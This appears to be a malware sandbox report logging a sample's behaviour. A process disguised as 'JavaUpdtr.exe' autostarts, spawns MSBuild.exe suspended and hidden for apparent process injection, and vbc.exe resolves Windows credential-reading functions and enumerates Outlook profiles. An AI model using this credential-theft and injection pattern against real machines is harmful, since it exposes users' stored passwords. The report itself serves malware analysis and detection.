Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles - False 1
Module (32)
Operation Module Additional Information Success Count Logfile
Load comctl32.dll base_address = 0x73530000 True 1
Load shell32.dll base_address = 0x75fd0000 True 1
Load pstorec.dll base_address = 0x73520000 True 1
Load crypt32.dll base_address = 0x759b0000 True 2
Load advapi32.dll base_address = 0x74d40000 True 3
Get Handle c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe base_address = 0x400000 True 2
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, size = 260 True 2
Get Address c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll function = InitCommonControlsEx, address_out = 0x73536be6 True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderPathA, address_out = 0x7621fb26 True 1
Get Address c:\windows\syswow64\pstorec.dll function = PStoreCreateInstance, address_out = 0x7352526c True 1
Get Address c:\windows\syswow64\crypt32.dll function = CryptUnprotectData, address_out = 0x759e5a7f True 2
Get Address c:\windows\syswow64\advapi32.dll function = CredReadA, address_out = 0x74d871c1 True 3
Get Address c:\windows\syswow64\advapi32.dll function = CredFree, address_out = 0x74d4b2ec True 3
Get Address c:\windows\syswow64\advapi32.dll function = CredDeleteA, address_out = 0x74d87941 True 3
Get Address c:\windows\syswow64\advapi32.dll function = CredEnumerateA, address_out = 0x74d87381 True 3
Get Address c:\windows\syswow64\advapi32.dll function = CredEnumerateW, address_out = 0x74d87481 True 3
User (1)
Operation Additional Information Success Count Logfile
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
System (2)
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XDUWTFONO True 1
Get Info type = Operating System True 1
Ini (7)
Operation Filename Additional Information Success Count Logfile
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg section_name = General, key_name = ShowGridLines, default_value = 0 True 1
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg section_name = General, key_name = SaveFilterIndex, default_value = 0 True 1
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg section_name = General, key_name = AddExportHeaderLine, default_value = 0 True 1
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg section_name = General, key_name = MarkOddEvenRows, default_value = 0 True 1
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg section_name = General, key_name = WinPos False 1
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg section_name = General, key_name = Columns False 1
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg section_name = General, key_name = Sort, default_value = 0 True 1
Process #7: javaupdtr.exe
616 0
Information Value
ID #7
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:40, Reason: Autostart
Unmonitor End Time: 00:01:58, Reason: Self Terminated
Monitor Duration 00:00:18
OS Process Information
Information Value
PID 0x4e8
Parent PID 0x3a4 (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x4EC, 0x6DC, 0x6E4, 0x6F8, 0x6FC, 0x720, 0x724, 0x730, 0x734
Host Behavior
File (4)
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp type = file_type True 2
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp size = 64 True 1
Process (4)
Operation Process Additional Information Success Count Logfile
Create C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe os_pid = 0x708, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Enumerate Processes - - True 1
Open c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe desired_access = PROCESS_TERMINATE True 1
Terminate c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe exit_code = 4294967295 True 1
Thread (1)
Operation Process Additional Information Success Count Logfile
Get Context c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe os_tid = 0x4ec True 1
Memory (2)
Operation Process Additional Information Success Count Logfile
Allocate C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe address = 0, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 360448 False 1
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe address = 2130567176, size = 4 True 1
Module (578)
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 8
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 8
User (1)
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
System (2)
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 2
Environment (2)
Operation Additional Information Success Count Logfile
Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Get Environment String name = windir, result_out = C:\Windows True 1
Process #8: msbuild.exe
0 0
Information Value
ID #8
File Name c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe
Command Line "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:56, Reason: Child Process
Unmonitor End Time: 00:01:58, Reason: Self Terminated
Monitor Duration 00:00:02
Remark No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x708
Parent PID 0x4e8 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x70C
Process #9: msbuild.exe
182 9
Information Value
ID #9
File Name c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe
Command Line "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:56, Reason: Child Process
Unmonitor End Time: 00:02:26, Reason: Terminated by Timeout
Monitor Duration 00:00:29
OS Process Information
Information Value
PID 0x718
Parent PID 0x4e8 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x71C, 0x728, 0x72C, 0x7B8, 0x7C4, 0x7C8, 0x7CC, 0x5FC, 0x670, 0x674, 0x650, 0x4EC, 0x4E8
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x005B0000 0x005B0FFF First Execution - 32-bit 0x005B0C1C, 0x005B09C4, ... False False
Host Behavior
COM (13)
Operation Class Interface Additional Information Success Count Logfile
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 2
Create WbemDefaultPathParser IWbemPath cls_context = CLSCTX_INPROC_SERVER True 3
Create WbemDefaultPathParser IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 5
Create WBEMLocator IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\.\root\cimv2 True 1
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\.\root\cimv2 True 1
File (21)
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Create C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config type = file_attributes True 1
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config type = file_attributes True 2
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config type = file_type True 2
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config type = file_attributes True 2
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config type = file_type True 2
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 6
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 237 True 1
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 0 True 1
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config size = 4096, size_out = 559 True 1
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config size = 4096, size_out = 0 True 1
Registry (31)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance - True 1
Fn
Open Key HKEY_CURRENT_USER - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting value_name = Default Impersonation Level, data = 3 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting value_name = Default Namespace True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting value_name = Default Namespace, data = 114 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductId, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework value_name = DbgJITDebugLaunchSetting, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework value_name = DbgManagedDebugger, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Module (56)
Operation Module Additional Information Success Count Logfile
Load C:\Windows\system32\advapi32.dll base_address = 0x75db0000 True 1
Fn
Load C:\Windows\Microsoft.NET\Framework\v2.0.50727\\wminet_utils.dll base_address = 0x6a310000 True 1
Fn
Get Handle c:\windows\syswow64\user32.dll base_address = 0x75a40000 True 1
Fn
Get Handle private_0x0000000000400000 base_address = 0x400000 True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = DuplicateTokenEx, address_out = 0x75dbca24 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = ResetSecurity, address_out = 0x6a311944 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = SetSecurity, address_out = 0x6a311986 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = BlessIWbemServices, address_out = 0x6a3119cc True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = BlessIWbemServicesObject, address_out = 0x6a311a1e True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetPropertyHandle, address_out = 0x6a311a70 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = WritePropertyValue, address_out = 0x6a311a89 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = Clone, address_out = 0x6a311aa2 True 2
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = VerifyClientKey, address_out = 0x6a312270 True 1
Fn
